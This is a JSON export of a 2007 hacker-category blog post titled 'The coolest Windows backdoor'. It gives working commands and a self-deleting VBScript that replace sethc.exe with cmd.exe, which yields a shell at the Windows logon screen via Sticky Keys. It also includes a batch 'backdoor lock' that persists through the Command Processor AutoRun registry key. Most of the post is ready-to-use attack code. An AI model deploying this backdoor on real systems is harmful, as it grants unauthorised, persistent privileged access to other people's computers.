{"id":184,"date":"2007-09-27T17:22:14","date_gmt":"2007-09-27T09:22:14","guid":{"rendered":"http:\/\/www.liangliang.org.cn\/blog\/?p=184"},"modified":"2007-09-27T17:22:14","modified_gmt":"2007-09-27T09:22:14","slug":"%e6%9c%80%e9%85%b7%e7%9a%84windows%e5%90%8e%e9%97%a8","status":"publish","type":"post","link":"https:\/\/www.liangliang.org.cn\/?p=184","title":{"rendered":"The coolest Windows backdoor"},"content":{"rendered":"<p>On Windows 2000\/XP\/Vista, pressing the Shift key 5 times opens Sticky Keys, which runs sethc.exe, and this also works at the logon screen. This brings to mind the Windows screensaver: once the program is replaced with cmd.exe, a shell can be opened.<\/p>\n<p>Reference, McafeeAvertLabs:<br \/>\nhttp:\/\/feeds.feedburner.com\/~r\/McafeeAvertLabsBlog\/~3\/101149799\/<\/p>\n<p>XP:<br \/>\nEject the installation source CD (or rename the installation directory on the hard disk)<br \/>\ncd %widnir%\\system32\\dllcache<br \/>\nren sethc.exe *.ex~<br \/>\ncd %widnir%\\system32<br \/>\ncopy \/y cmd.exe sethc.exe<\/p>\n<p>VISTA:<br \/>\ntakeown \/f c:\\windows\\system32\\sethc.exe<br \/>\ncacls c:\\windows\\system32\\sethc.exe \/G administrator:F<br \/>\nThen replace the file using the XP method<\/p>\n<p>At the logon screen, press SHIFT 5 times and a cmd shell appears, and then\u2026\u2026<\/p>\n<p>Backdoor extension:<\/p>\n<p>Reposted from: 7j blog http:\/\/1v1.name\/show-241-1.html#cm300<\/p>\n<p>Another update<br \/>\nDim obj, success<br \/>\nSet obj = CreateObject(\"WScript.Shell\")<br \/>\nsuccess = obj.run(\"cmd \/c takeown \/f %SystemRoot%\\system32\\sethc.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c echo y| cacls %SystemRoot%\\system32\\sethc.exe \/G 
%USERNAME%:F\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c copy %SystemRoot%\\system32\\cmd.exe %SystemRoot%\\system32\\acmd.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c copy %SystemRoot%\\system32\\sethc.exe %SystemRoot%\\system32\\asethc.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c del %SystemRoot%\\system32\\sethc.exe\", 0, True)<br \/>\nsuccess = obj.run(\"cmd \/c ren %SystemRoot%\\system32\\acmd.exe sethc.exe\", 0, True)<\/p>\n<p>The second statement is the most interesting. Hehe.. automatic answer.... I ran into a similar problem before<\/p>\n<p>Another update. Added self-deletion and simplified the code...<br \/>\nOn Error Resume Next<br \/>\nDim obj, success<br \/>\nSet obj = CreateObject(\"WScript.Shell\")<br \/>\nsuccess = obj.run(\"cmd \/c takeown \/f %SystemRoot%\\system32\\sethc.exe&amp;echo y| cacls %SystemRoot%\\system32\\sethc.exe \/G %USERNAME%:F&amp;copy %SystemRoot%\\system32\\cmd.exe %SystemRoot%\\system32\\acmd.exe&amp;copy %SystemRoot%\\system32\\sethc.exe %SystemRoot%\\system32\\asethc.exe&amp;del %SystemRoot%\\system32\\sethc.exe&amp;ren %SystemRoot%\\system32\\acmd.exe sethc.exe\", 0, True)<br \/>\nCreateObject(\"Scripting.FileSystemObject\").DeleteFile(WScript.ScriptName)<\/p>\n<p>allyesno's note: for ways of dealing with file protection, you can also refer to my article cut wfp 's jj easily<\/p>\n<p>https:\/\/www.xfocus.net\/bbs\/index.php?act=SE&f=2&t=58099&p=269293<\/p>\n<p>Backdoor lock extension:<\/p>\n<p>allyesno's note: a cmd lock can be used to do password verification for the cmd shell, hehe...<\/p>\n<p>To use the backdoor lock below, save the code as bdlock.bat<\/p>\n<p>Then just modify the registry location<\/p>\n<p>[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Command 
Processor]<br \/>\n\"AutoRun\"=\"bdlock.bat\"<\/p>\n<p>@Echo Off<br \/>\ntitle \u540e\u95e8\u767b\u9646\u9a8c\u8bc1<br \/>\ncolor a<br \/>\ncls<br \/>\nset temprandom=%RANDOM%<br \/>\necho \u8bf7\u8f93\u5165\u9a8c\u8bc1\u7801:%temprandom%<br \/>\nset\/p check=<br \/>\nif \"%check%\"==\"%temprandom%%temprandom%\" goto passcheck<br \/>\nif \"%check%\"==\"%temprandom%\" (<br \/>\nrem Backdoor server verification<br \/>\nrem If there is no backdoor verification server, comment out the next line of code with rem<br \/>\nif exist \\192.168.8.8\\backdoor$\\pass goto passcheck<br \/>\n)<br \/>\necho \u9a8c\u8bc1\u5931\u8d25<br \/>\npause<br \/>\nexit<br \/>\n:passcheck<br \/>\necho \u9a8c\u8bc1\u6210\u529f<br \/>\nIf \"%passcmdlock%\"==\"http:\/\/blog.csdn.net\/freexploit\/\" Goto endx<br \/>\nSet passcmdlock=http:\/\/blog.csdn.net\/freexploit\/<br \/>\n:allyesno<br \/>\nSet Errorlevel=&gt;nul<br \/>\nEcho \u8bf7\u8f93\u5165\u9a8c\u8bc1\u5bc6\u7801\uff1f<br \/>\nSet password=allyesno Is a pig&gt;nul<br \/>\nSet\/p password=<br \/>\nrem Master password<br \/>\nif \"%password%\"==\"allyesno is a sb\" goto endx<br \/>\nIf %time:~1,1%==0 Set timechange=a<br \/>\nIf %time:~1,1%==1 Set timechange=b<br \/>\nIf %time:~1,1%==2 Set timechange=c<br \/>\nIf %time:~1,1%==3 Set timechange=d<br \/>\nIf %time:~1,1%==4 Set timechange=e<br \/>\nIf %time:~1,1%==5 Set timechange=f<br \/>\nIf %time:~1,1%==6 Set timechange=g<br \/>\nIf %time:~1,1%==7 Set timechange=h<br \/>\nIf %time:~1,1%==8 Set timechange=i<br \/>\nIf %time:~1,1%==9 Set timechange=j<br \/>\nset\/a sum=%time:~1,1%+%time:~1,1%<br \/>\nSet password|findstr \"^password=%timechange%%time:~1,1%%date:~8,2%%sum%$\"&gt;nul<br \/>\nIf \"%errorlevel%\"==\"0\" cls&amp;Echo \u53e3\u4ee4\u6b63\u786e&amp;Goto End<br \/>\nEcho \u8bf7\u8054\u7cfb\u745e\u661f\u5ba2\u670d\u54a8\u8be2\u6b63\u786e\u5bc6\u7801\uff01&amp;Goto allyesno<br \/>\n:End<br \/>\nSet password=&gt;nul<br \/>\nSet 
Errorlevel=&gt;nul<br \/>\nEcho \u5f88\u597d\uff0c\u5f88\u548c\u8c10\uff01<br \/>\n:endx<\/p>\n","protected":false},"excerpt":{"rendered":"<p>On Windows 2000\/XP\/Vista, pressing the Shift key 5 times opens Sticky Keys, which runs sethc.exe, and this also works at the logon screen. This brings to mind the Windows screensaver: replacing the program with cmd.exe&#46;&#46;&#46;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[],"class_list":["post-184","post","type-post","status-publish","format-standard","hentry","category-hacker"],"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/184","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=184"}],"version-history":[{"count":0,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=\/wp\/v2\/posts\/184\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=184"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=184"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.liangliang.org.cn\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=184"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{re
l}","templated":true}]}}